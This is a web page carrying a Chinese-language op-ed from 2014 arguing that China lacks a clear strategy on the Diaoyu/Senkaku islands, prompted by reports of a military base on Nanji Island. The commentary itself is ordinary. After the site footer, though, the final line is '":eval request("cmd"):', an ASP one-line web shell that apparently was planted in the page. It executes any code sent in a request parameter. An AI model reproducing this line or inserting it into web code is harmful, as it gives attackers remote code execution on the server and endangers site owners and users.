保钓理论

中国需要有清晰的钓鱼岛战略

时间:2014-12-30 23:37:59  作者:林泉忠  来源:  查看:249  评论:0
内容摘要:近日盛传中国在离钓鱼台“较近”的南麂岛建设军事基地,引发日本媒体乃至官方的高度关切。究竟此举是否会意味着中国在钓鱼岛问题上有了全新的战略?是否为2015年钓鱼台局势与中日关系投下新的变数?对包含“防卫”钓鱼岛的美日安保战略是否造成影...
近日盛传中国在离钓鱼台“较近”的南麂岛建设军事基地,引发日本媒体乃至官方的高度关切。究竟此举是否会意味着中国在钓鱼岛问题上有了全新的战略?是否为2015年钓鱼台局势与中日关系投下新的变数?对包含“防卫”钓鱼岛的美日安保战略是否造成影响?备受关注。
 
此新闻由日本《共同社》披露,称中方已在此安装了最先进的雷达设备,且正在修建直升机场,并有计划建设军用飞机跑道。此外,今秋数百名军方人员已进入该列岛52个岛屿中最大的南麂岛。过去南麂岛上仅有少量海军士兵驻扎,2013年前后中国空军已开始进驻。预计陆军也将加入,实现陆海空三军共同驻扎。不过,中国政府迄今不予证实。
 
日媒强调南麂列岛离钓鱼岛“仅约300公里,比日本自卫队和美军驻扎的冲绳那霸离钓鱼岛近100公里”。其实,南麂列岛位于浙江省鰲江港外56公里,与台湾本岛的距离是150公里,谈不上距离钓鱼岛“很近”。由于中国是在离大陆较近的自己的领土建设军事设施,本身并无不当,因此日方也无从“抗议”,且该基地是否为中国应对钓鱼岛局势的战略部署,仍有待证实。
 
再者,日本在2012年中日爆发钓鱼岛冲突之后,日本也在强化对包括钓鱼岛在内的“南西诸岛”的防卫,而且除了已在今年四月落实在离台湾最近的与那国岛驻军及设置雷达系统外,亦宣佈将在另外两个离钓鱼岛最近的石垣岛与宫古岛、及冲绳北部即原为琉球国版图内的奄美大岛驻扎自卫队的决定。
 
在过去数十年来,中国在从“韬光养晦”走向“有所作为”的战略调整过程中,缺乏目标清晰的“钓鱼岛战略”。2012年发生日本对钓鱼岛的“国有化”措施后,中国顺势将渔政、海监、后来整合成海警船进出钓鱼岛12海里。然而,此举究竟只是停留在官方对钓鱼岛的主权宣示,还是为了要展示钓鱼岛“实质存在争议”,以破解日本至今“不承认钓鱼岛存在主权争议”的思维,还是为了“夺岛”做准备?去年“两会”期间国家测绘局副局长声称将“登岛测量”,然而至今只闻楼梯响。
 
因此,如果中国在南麂岛建设基地与钓鱼岛战略挂钩,自然值得关注。中国已有东海舰队,钓鱼岛海域的巡逻则由海警船负责,飞机近期也不再飞去钓鱼岛领空。因此,该海陆空新基地在“保钓”战略中具体扮演什么角色,有待嫠清。
 
话说回来,从东海区域和平的视角而言,无论是中国在南麂岛建设军事基地,还是去年11月宣布“东海防空识别区”;无论是日本在“南西诸岛”落实驻军,还是强化对东海的防卫能力,倘若都是在各自领土范围内的行为,从主权的观点来看,本身无可厚非。然而,众所周知,东海中的钓鱼岛存在多方争议,在地缘政治上是各方冲突的“火药库”。因此,为了避免导致误判,或引发东海区域的军事竞逐,任何涉及钓鱼岛且引发他方担忧的新军事行为都应该有所克制,并且与相关国家进行适当的沟通,以利区域和平之维系。
 
总而言之,从“2012钓鱼岛冲突”以来,中国在钓鱼岛问题上屡有作为,却缺乏稳定的战略思维与清晰的战略目标,包括迄今仍未成立笔者多年呼吁的“东海研究院”或专门的“钓鱼岛研究中心”。中国未来能否制定出短、中、长期步骤清晰、既符合国家利益,又有利于区域和平的“钓鱼岛战略”,仍有待观察。
 
相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):